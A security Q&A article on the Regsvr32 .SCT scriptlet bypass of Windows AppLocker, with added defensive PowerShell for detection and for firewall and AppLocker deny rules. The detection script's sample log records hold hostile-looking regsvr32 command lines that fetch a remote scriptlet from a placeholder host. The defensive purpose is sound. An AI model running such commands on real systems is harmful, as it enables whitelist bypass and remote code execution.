
How is Windows AppLocker whitelisting bypassed by Regsvr32?

Windows AppLocker whitelisting was discovered to be exploitable with the command-line tool Regsvr32. Expert Nick Lewis explains how organizations can mitigate possible attacks.

A Windows command-line utility, Regsvr32, was discovered to enable an almost undetectable Windows AppLocker whitelist bypass. What exactly are the risks with this vulnerability? How can enterprises secure their environments against possible attacks?

Outside of the Windows admins who are familiar with Windows internals going back to Windows NT, few people know about the complexity and power of the legacy programming and scripting internals that remain in modern Windows OSes. Windows system admins today might be learning PowerShell, but early Windows admins used batch files and scripting languages to chain different tools together and automate many tasks. The scripting tools in Microsoft's admin kits were considerably powerful. One of the hardest scripting skills to master was COM+, and it was used mainly by software developers.

It's important to note that these tools are now part of the living-off-the-land attack movement, in which attackers use malware-free techniques to gain entry into an environment and turn the organization's existing tools and utilities against it.

Researcher Casey Smith identified a vulnerability in Windows AppLocker that is exploitable via the command-line tool Regsvr32: Regsvr32 is pointed at a malicious .SCT scriptlet file, which abuses COM+ functionality to run malicious commands as the current user. The risk from the Windows AppLocker whitelisting vulnerability is that an attacker could execute code on the endpoint that the whitelist was meant to block, and use it to exploit other vulnerabilities there.
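Because the bypass runs through a signed, whitelisted Windows binary, the practical detection handle is the command line Regsvr32 is started with. The following PowerShell is an added example, not code from the original article or from the researcher: it runs a simple triage pass over process-creation records and flags regsvr32.exe invocations that reference a .SCT scriptlet or a URL. The `$records` array is constructed sample data standing in for Sysmon Event ID 1 or Security 4688 fields, and the field names (`Time`, `User`, `Image`, `CommandLine`) are assumptions for this example.

```powershell
# Added example (not from the original article): flag regsvr32.exe process
# creations that point at a .SCT scriptlet or carry a URL, the pattern the
# answer describes. $records is constructed sample data; in practice these
# fields would come from Sysmon Event ID 1 or Security Event 4688.
$records = @(
    [pscustomobject]@{ Time = '2016-09-01T10:01:00'; User = 'CORP\jdoe'
                       Image = 'C:\Windows\System32\regsvr32.exe'
                       CommandLine = 'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"' }
    [pscustomobject]@{ Time = '2016-09-01T10:02:00'; User = 'CORP\jdoe'
                       Image = 'C:\Windows\System32\regsvr32.exe'
                       CommandLine = 'regsvr32.exe /s /i:http://example.invalid/update.sct' }
    [pscustomobject]@{ Time = '2016-09-01T10:03:00'; User = 'CORP\jdoe'
                       Image = 'C:\Windows\System32\regsvr32.exe'
                       CommandLine = 'regsvr32.exe /s /i:C:\Users\jdoe\AppData\Local\Temp\setup.sct' }
    [pscustomobject]@{ Time = '2016-09-01T10:04:00'; User = 'CORP\jdoe'
                       Image = 'C:\Windows\System32\notepad.exe'
                       CommandLine = 'notepad.exe C:\Users\jdoe\notes.sct' }
)

function Test-SuspiciousRegsvr32 {
    param([Parameter(Mandatory)] $Record)

    # Only regsvr32.exe is in scope; key on the image path rather than on the
    # first token of the command line, which is easy to obscure.
    if ($Record.Image -notmatch '\\regsvr32\.exe$') { return $null }

    $reasons = @()
    # A .sct scriptlet is never a legitimate argument to regsvr32 (it registers DLLs).
    if ($Record.CommandLine -match '\.sct(\s|"|$)') {
        $reasons += 'scriptlet (.sct) file passed to regsvr32'
    }
    # Regsvr32 should only be handed local DLL paths; a URL means a remote fetch.
    if ($Record.CommandLine -match 'https?://') {
        $reasons += 'URL on the regsvr32 command line'
    }
    if ($reasons.Count -eq 0) { return $null }

    [pscustomobject]@{
        Time        = $Record.Time
        User        = $Record.User
        CommandLine = $Record.CommandLine
        Reasons     = ($reasons -join '; ')
    }
}

$hits = $records | ForEach-Object { Test-SuspiciousRegsvr32 $_ } | Where-Object { $null -ne $_ }
$hits | Format-Table -AutoSize
```

With the constructed records, the vendor DLL registration and the notepad.exe line are ignored, the HTTP .sct record is flagged on both conditions, and the local .sct record is flagged on the scriptlet condition alone. Sysmon Event ID 3 (network connection) records whose `Image` is regsvr32.exe are a second, independent signal worth alerting on, since the binary has no legitimate reason to reach the network.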

An enterprise can protect against these kinds of attacks on legacy functionality by disabling unnecessary functionality through group policy. Enterprises can also use Microsoft's security configuration tool set and Active Directory to push group policy to domain-joined endpoints. An enterprise could even remove unneeded executables or remove access to them, but this could be complicated and have unintended consequences. Endpoint security tools such as whitelisting or host intrusion detection systems could also provide similar functionality. Allowing outbound connections on the endpoint only from approved executables could also potentially block the Windows AppLocker exploit.
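Two of the mitigations above can be expressed directly in PowerShell: blocking outbound connections from regsvr32.exe with the Windows Firewall, and adding an AppLocker deny rule for the executable. The script below is an added example, not code from the original article; rule names, the temporary policy file path and the choice to start in audit mode are assumptions for this example. Run it in an elevated session on a test machine first, because denying regsvr32.exe outright can break installers that register COM DLLs, which is the "unintended consequences" caveat the answer raises.

```powershell
# Added example (not from the original article). Run elevated, on a test host first.

# --- 1. Outbound firewall rules: regsvr32.exe has no legitimate reason to reach the network,
#        so blocking it cuts off the remote .SCT fetch even if the process launches.
$regsvr32Paths = @(
    "$env:SystemRoot\System32\regsvr32.exe",
    "$env:SystemRoot\SysWOW64\regsvr32.exe"   # 32-bit copy present on 64-bit Windows
)
foreach ($path in $regsvr32Paths) {
    if (Test-Path $path) {
        New-NetFirewallRule -DisplayName "Block outbound: $path" `
            -Direction Outbound -Program $path -Action Block -Profile Any -Enabled True | Out-Null
    }
}

# --- 2. AppLocker deny rule. AppLocker evaluates deny rules before allow rules, so this
#        holds even when the existing policy allows everything under %WINDIR%.
#        EnforcementMode starts as AuditOnly; switch to "Enabled" after reviewing the audit events.
#        Narrow UserOrGroupSid (S-1-1-0 = Everyone) to the groups that should never run it.
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="AuditOnly">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny regsvr32.exe (System32)"
                  Description="Added example: limit Regsvr32 scriptlet (.SCT) abuse"
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%SYSTEM32%\regsvr32.exe" />
      </Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny regsvr32.exe (SysWOW64)"
                  Description="Added example: limit Regsvr32 scriptlet (.SCT) abuse"
                  UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions>
        <FilePathCondition Path="%WINDIR%\SysWOW64\regsvr32.exe" />
      </Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@

$policyFile = Join-Path $env:TEMP 'deny-regsvr32.xml'   # assumed temporary path
Set-Content -Path $policyFile -Value $policyXml -Encoding UTF8

# Check the rule's decision for regsvr32.exe before applying anything.
Test-AppLockerPolicy -XmlPolicy $policyFile -Path "$env:SystemRoot\System32\regsvr32.exe" -User Everyone

# AppLocker only enforces while the Application Identity service is running.
Set-Service -Name AppIDSvc -StartupType Automatic
Start-Service -Name AppIDSvc

# Merge into the local policy; add -Ldap '<LDAP path of the GPO>' to push it via group policy instead.
Set-AppLockerPolicy -XmlPolicy $policyFile -Merge

# Verify the effective policy, then watch the audit log for would-be blocks (8003) and blocks (8004).
Get-AppLockerPolicy -Effective -Xml
Get-WinEvent -LogName 'Microsoft-Windows-AppLocker/EXE and DLL' -MaxEvents 50 |
    Where-Object { $_.Id -in 8003, 8004 } |
    Select-Object TimeCreated, Id, Message
```

The firewall rules are the lower-risk change and can go out first; the AppLocker deny rule should sit in audit mode long enough to confirm that no deployment or installer job on the fleet legitimately calls regsvr32.exe under a standard user account before it is switched to enforce.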


This was last published in September 2016
